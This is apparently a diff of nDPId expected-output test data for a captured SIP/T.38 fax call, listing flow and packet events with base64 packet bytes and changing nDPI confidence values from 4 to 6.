00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1228468958651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1228468958651,"pkt":"ABEKVkXRAAFbASs3CABFAAOJP55AAEARkp8KIygZCiMoyBPEE8QDdUDuSU5WSVRFIHNpcDowNjE5NjMxNzctaWtodXVlcDViaTEyM0AxMC4zNS42MC4xMDA6NTA2MDt0cmFuc3BvcnQ9dWRwIFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTAuMzUuNjAuNzI6NTA2MDticmFuY2g9ejloRzRiSy5pSWlJaUkuMGEyMzI4MTkuZTlkNGJkDQpUbzogIDxzaXA6MDYxOTYzMTc3QGl0YWx0ZWwuaXQ7dXNlcj1waG9uZT4NCkZyb206IDxzaXA6dW5hdmFpbGFibGVAaG9zdHBvcnRpb24+O3RhZz0wMGU5ZDQ3OA0KQ2FsbC1JRDogMDBlOWQ0YTUwMGU5ZDQ4LTAwMTUtMDAwMS0wMDAwLTAwMDBAMTAuMzUuNDAuMjUNCkNTZXE6ICAxIElOVklURQ0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDphbm9ueW1vdXMuaUlpSWlJLjBhMjMyODE5LkAxMC4zNS42MC43Mj4NCkFsbG93OiBJTlZJVEUsIEFDSywgUFJBQ0ssIENBTkNFTCwgQllFLCBPUFRJT05TLCBNRVNTQUdFLCBOT1RJRlksIFVQREFURSwgUkVHSVNURVIsIElORk8sIFJFRkVSLCBTVUJTQ1JJQkUNCkFjY2VwdDogYXBwbGljYXRpb24vc2RwLCBhcHBsaWNhdGlvbi9pc3VwLCBhcHBsaWNhdGlvbi94bWwsIGFwcGxpY2F0aW9uL2R0bWYtcmVsYXkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LUxlbmd0aDogMjQwDQoNCnY9MA0Kbz0tIDE5MSAxMjI4NTAwNzM2IElOIElQNCAxMC4yMy4xLjUyDQpzPUlNU1MNCmM9SU4gSVA0IDEwLjIzLjEuNTINCnQ9MCAwDQptPWF1ZGlvIDE2NzU2IFJUUC9BVlAgOCAxMDMgMTAyDQphPXJ0cG1hcDoxMDMgRzcyNi0zMi84MDAwDQphPXB0aW1lOjMwDQphPXJ0cG1hcDoxMDIgdGVsZXBob25lLWV2ZW50LzgwMDAvMQ0KYT1mbXRwOjEwMiAwLTE1DQphPXNxbjowDQphPWNkc2M6MSBpbWFnZSB1ZHB0bCB0MzgNCg=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1228468958652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1228468958652,"pkt":"ABEKVkXQAAglAXLqCABFAAEiAABAAIARbNkKIzxkCiM8SBPEE8QBDiJNU0lQLzIuMCAxMDAgVHJ5aW5nDQpWaWE6IFNJUC8yLjAvVURQIDEwLjM1LjYwLjcyOjUwNjA7YnJhbmNoPXo5aEc0YksuaUlpSWlJLjBhMjMyODE5LmU5ZDRiZA0KVG86IDxzaXA6MDYxOTYzMTc3QGl0YWx0ZWwuaXQ7dXNlcj1waG9uZT4NCkZyb206IDxzaXA6dW5hdmFpbGFibGVAaG9zdHBvcnRpb24+O3RhZz0wMGU5ZDQ3OA0KQ2FsbC1JRDogMDBlOWQ0YTUwMGU5ZDQ4LTAwMTUtMDAwMS0wMDAwLTAwMDBAMTAuMzUuNDAuMjUNCkNTZXE6IDEgSU5WSVRFDQoNCg=="} 01628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1228468958653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1228468958653,"pkt":"ABEKVkXRAAFbASs3CABFAAOJP55AAEARkp8KIygZCiMoyBPEE8QDdUDuSU5WSVRFIHNpcDowNjE5NjMxNzctaWtodXVlcDViaTEyM0AxMC4zNS42MC4xMDA6NTA2MDt0cmFuc3BvcnQ9dWRwIFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTAuMzUuNjAuNzI6NTA2MDticmFuY2g9ejloRzRiSy5pSWlJaUkuMGEyMzI4MTkuZTlkNGJkDQpUbzogIDxzaXA6MDYxOTYzMTc3QGl0YWx0ZWwuaXQ7dXNlcj1waG9uZT4NCkZyb206IDxzaXA6dW5hdmFpbGFibGVAaG9zdHBvcnRpb24+O3RhZz0wMGU5ZDQ3OA0KQ2FsbC1JRDogMDBlOWQ0YTUwMGU5ZDQ4LTAwMTUtMDAwMS0wMDAwLTAwMDBAMTAuMzUuNDAuMjUNCkNTZXE6ICAxIElOVklURQ0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDphbm9ueW1vdXMuaUlpSWlJLjBhMjMyODE5LkAxMC4zNS42MC43Mj4NCkFsbG93OiBJTlZJVEUsIEFDSywgUFJBQ0ssIENBTkNFTCwgQllFLCBPUFRJT05TLCBNRVNTQUdFLCBOT1RJRlksIFVQREFURSwgUkVHSVNURVIsIElORk8sIFJFRkVSLCBTVUJTQ1JJQkUNCkFjY2VwdDogYXBwbGljYXRpb24vc2RwLCBhcHBsaWNhdGlvbi9pc3VwLCBhcHBsaWNhdGlvbi94bWwsIGFwcGxpY2F0aW9uL2R0bWYtcmVsYXkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LUxlbmd0aDogMjQwDQoNCnY9MA0Kbz0tIDE5MSAxMjI4NTAwNzM2IElOIElQNCAxMC4yMy4xLjUyDQpzPUlNU1MNCmM9SU4gSVA0IDEwLjIzLjEuNTINCnQ9MCAwDQptPWF1ZGlvIDE2NzU2IFJUUC9BVlAgOCAxMDMgMTAyDQphPXJ0cG1hcDoxMDMgRzcyNi0zMi84MDAwDQphPXB0aW1lOjMwDQphPXJ0cG1hcDoxMDIgdGVsZXBob25lLWV2ZW50LzgwMDAvMQ0KYT1mbXRwOjEwMiAwLTE1DQphPXNxbjowDQphPWNkc2M6MSBpbWFnZSB1ZHB0bCB0MzgNCg=="} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958657,"flow_last_seen":1228468958657,"flow_idle_time":200000,"flow_min_l4_payload_len":884,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":884,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1228468958657,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1228468958657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":926,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":926,"pkt_l4_len":892,"thread_ts_msec":1228468958657,"pkt":"AAAMB6ypAAglAXLkCABFAAOQAABAAIARne+KhKllwKhk2xPEE8QDfOJtSU5WSVRFIHNpcDowNjE5NjMxNzdAMTkyLjE2OC4xMDAuMjE5OjUwNjAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMzguMTMyLjE2OS4xMDE6NTA2MDticmFuY2g9ejloRzRiS2Z2MmY0MDEwNzg3aDNhOHExMjgwLjENClRvOiA8c2lwOjA2MTk2MzE3N0BpdGFsdGVsLml0O3VzZXI9cGhvbmU+DQpGcm9tOiA8c2lwOnVuYXZhaWxhYmxlQGhvc3Rwb3J0aW9uPjt0YWc9U0Q0OTA5NzAxLTAwZTlkNDc4DQpDYWxsLUlEOiBTRDQ5MDk3MDEtOWZmMTFiZjcyZWI0YTM0N2M5Mjk3NGQ4ZmJiYzI2NjgtYW84bzNpMQ0KQ1NlcTogMSBJTlZJVEUNCk1heC1Gb3J3YXJkczogNjkNCkNvbnRhY3Q6IDxzaXA6dW5hdmFpbGFibGVAMTM4LjEzMi4xNjkuMTAxOjUwNjA7dHJhbnNwb3J0PXVkcD4NCkFsbG93OiBJTlZJVEUsIEFDSywgUFJBQ0ssIENBTkNFTCwgQllFLCBPUFRJT05TLCBNRVNTQUdFLCBOT1RJRlksIFVQREFURSwgUkVHSVNURVIsIElORk8sIFJFRkVSLCBTVUJTQ1JJQkUNCkFjY2VwdDogYXBwbGljYXRpb24vc2RwLCBhcHBsaWNhdGlvbi9pc3VwLCBhcHBsaWNhdGlvbi94bWwsIGFwcGxpY2F0aW9uL2R0bWYtcmVsYXkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LUxlbmd0aDogMjUwDQoNCnY9MA0Kbz0tIDE5MSAxMjI4NTAwNzM2IElOIElQNCAxMzguMTMyLjE2OS4xMDENCnM9SU1TUw0KYz1JTiBJUDQgMTM4LjEzMi4xNjkuMTAxDQp0PTAgMA0KbT1hdWRpbyAxNTU4MCBSVFAvQVZQIDggMTAzIDEwMg0KYT1ydHBtYXA6MTAzIEc3MjYtMzIvODAwMA0KYT1wdGltZTozMA0KYT1ydHBtYXA6MTAyIHRlbGVwaG9uZS1ldmVudC84MDAwLzENCmE9Zm10cDoxMDIgMC0xNQ0KYT1zcW46MA0KYT1jZHNjOjEgaW1hZ2UgdWRwdGwgdDM4DQo="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958657,"flow_last_seen":1228468958657,"flow_idle_time":200000,"flow_min_l4_payload_len":884,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":884,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1228468958657,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958657,"flow_last_seen":1228468958657,"flow_idle_time":200000,"flow_min_l4_payload_len":884,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":884,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1228468958657,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1228468958657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1228468958657,"pkt":"AAFbASs3ABEKVkXRCABFAAEild5AAEARPsYKIyjICiMoGRPEE8QBDkoYU0lQLzIuMCAxMDAgVHJ5aW5nDQpWaWE6IFNJUC8yLjAvVURQIDEwLjM1LjYwLjcyOjUwNjA7YnJhbmNoPXo5aEc0YksuaUlpSWlJLjBhMjMyODE5LmU5ZDRiZA0KVG86IDxzaXA6MDYxOTYzMTc3QGl0YWx0ZWwuaXQ7dXNlcj1waG9uZT4NCkZyb206IDxzaXA6dW5hdmFpbGFibGVAaG9zdHBvcnRpb24+O3RhZz0wMGU5ZDQ3OA0KQ2FsbC1JRDogMDBlOWQ0YTUwMGU5ZDQ4LTAwMTUtMDAwMS0wMDAwLTAwMDBAMTAuMzUuNDAuMjUNCkNTZXE6IDEgSU5WSVRFDQoNCg=="} 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1228468958718,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":1228468958718,"pkt":"AAglAXLkABZGR+C\/CABFuAFFHeUAAD0RBJ7AqGTbioSpZRPEE8QBMRfZU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiBTRDQ5MDk3MDEtOWZmMTFiZjcyZWI0YTM0N2M5Mjk3NGQ4ZmJiYzI2NjgtYW84bzNpMQ0KQ29udGVudC1MZW5ndGg6IDANCkNTZXE6IDEgSU5WSVRFDQpGcm9tOiA8c2lwOnVuYXZhaWxhYmxlQGhvc3Rwb3J0aW9uPjt0YWc9U0Q0OTA5NzAxLTAwZTlkNDc4DQpUbzogPHNpcDowNjE5NjMxNzdAaXRhbHRlbC5pdDt1c2VyPXBob25lPg0KVmlhOiBTSVAvMi4wL1VEUCAxMzguMTMyLjE2OS4xMDE6NTA2MDticmFuY2g9ejloRzRiS2Z2MmY0MDEwNzg3aDNhOHExMjgwLjENCg0K"} 01029{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1228468958819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":469,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":469,"pkt_l4_len":435,"thread_ts_msec":1228468958819,"pkt":"AAglAXLkABZGR+C\/CABFuAHHHeYAAD0RBBvAqGTbioSpZRPEE8QBs3VMU0lQLzIuMCAxODAgUmluZ2luZw0KQ2FsbC1JRDogU0Q0OTA5NzAxLTlmZjExYmY3MmViNGEzNDdjOTI5NzRkOGZiYmMyNjY4LWFvOG8zaTENCkNvbnRhY3Q6IDxzaXA6MDYxOTYzMTc3QDE5Mi4xNjguMTAwLjIxOTo1MDYwPg0KQ29udGVudC1MZW5ndGg6IDANCkNTZXE6IDEgSU5WSVRFDQpGcm9tOiA8c2lwOnVuYXZhaWxhYmxlQGhvc3Rwb3J0aW9uPjt0YWc9U0Q0OTA5NzAxLTAwZTlkNDc4DQpTZXJ2ZXI6IEFyY29yL0FyY29yLTEuMDIuMDA1dDINClRvOiA8c2lwOjA2MTk2MzE3N0BpdGFsdGVsLml0O3VzZXI9cGhvbmU+O3RhZz02MTcyNjM2MTY0Nzk2MTZFLTMzMTcxNTUyMC01MzM2Zjc4NS0xODc0MTAyMDUNClZpYTogU0lQLzIuMC9VRFAgMTM4LjEzMi4xNjkuMTAxOjUwNjA7YnJhbmNoPXo5aEc0YktmdjJmNDAxMDc4N2gzYThxMTI4MC4xDQoNCg=="} 01052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1228468958820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":488,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":488,"pkt_l4_len":454,"thread_ts_msec":1228468958820,"pkt":"ABEKVkXQAAglAXLqCABFAAHaAABAAIARbCEKIzxkCiM8SBPEE8QBxvK8U0lQLzIuMCAxODAgUmluZ2luZw0KVmlhOiBTSVAvMi4wL1VEUCAxMC4zNS42MC43Mjo1MDYwO2JyYW5jaD16OWhHNGJLLmlJaUlpSS4wYTIzMjgxOS5lOWQ0YmQNClRvOiA8c2lwOjA2MTk2MzE3N0BpdGFsdGVsLml0O3VzZXI9cGhvbmU+O3RhZz1TRDQ5MDk3OTktNjE3MjYzNjE2NDc5NjE2RS0zMzE3MTU1MjAtNTMzNmY3ODUtMTg3NDEwMjA1DQpGcm9tOiA8c2lwOnVuYXZhaWxhYmxlQGhvc3Rwb3J0aW9uPjt0YWc9MDBlOWQ0NzgNCkNhbGwtSUQ6IDAwZTlkNGE1MDBlOWQ0OC0wMDE1LTAwMDEtMDAwMC0wMDAwQDEwLjM1LjQwLjI1DQpDU2VxOiAxIElOVklURQ0KQ29udGFjdDogPHNpcDowNjE5NjMxNzctaWtodXVlcDViaTEyM0AxMC4zNS42MC4xMDA6NTA2MDt0cmFuc3BvcnQ9dWRwPg0KQ29udGVudC1MZW5ndGg6IDANClNlcnZlcjogQXJjb3IvQXJjb3ItMS4wMi4wMDV0Mg0KDQo="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468965434,"flow_last_seen":1228468965434,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1228468965434,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1228468965434,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1228468965434,"pkt":"ABgYesP\/AAglAXLqCABFuADIHecAAD0RDLUKIzxkChcBNDzcQXQAtEC7gAgAAGfPFaAOrw6v1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1Q=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468965434,"flow_last_seen":1228468965434,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1228468965434,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468965434,"flow_last_seen":1228468965434,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1228468965434,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1228468965455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1228468965455,"pkt":"ABgYesP\/AAglAXLqCABFuADIHegAAD0RDLQKIzxkChcBNDzcQXQAtEAagAgAAWfPFkAOrw6v1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1Q=="} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1228468965474,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1228468965474,"pkt":"ABgYesP\/AAglAXLqCABFuADIHekAAD0RDLMKIzxkChcBNDzcQXQAtD95gAgAAmfPFuAOrw6v1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1Q=="} -00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6995,"flow_first_seen":1228468965434,"flow_last_seen":1228469042419,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1100399,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1228468937630,"flow_last_seen":1228469046884,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":541,"flow_tot_l4_payload_len":18110,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Megaco","breed":"Acceptable","category":"VoIP"}} -00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1228468958657,"flow_last_seen":1228469042442,"flow_idle_time":200000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":12177,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1228468958651,"flow_last_seen":1228469042445,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":881,"flow_tot_l4_payload_len":24540,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1228468958651,"flow_last_seen":1228469042444,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":881,"flow_tot_l4_payload_len":12270,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6995,"flow_first_seen":1228468965434,"flow_last_seen":1228469042419,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1100399,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 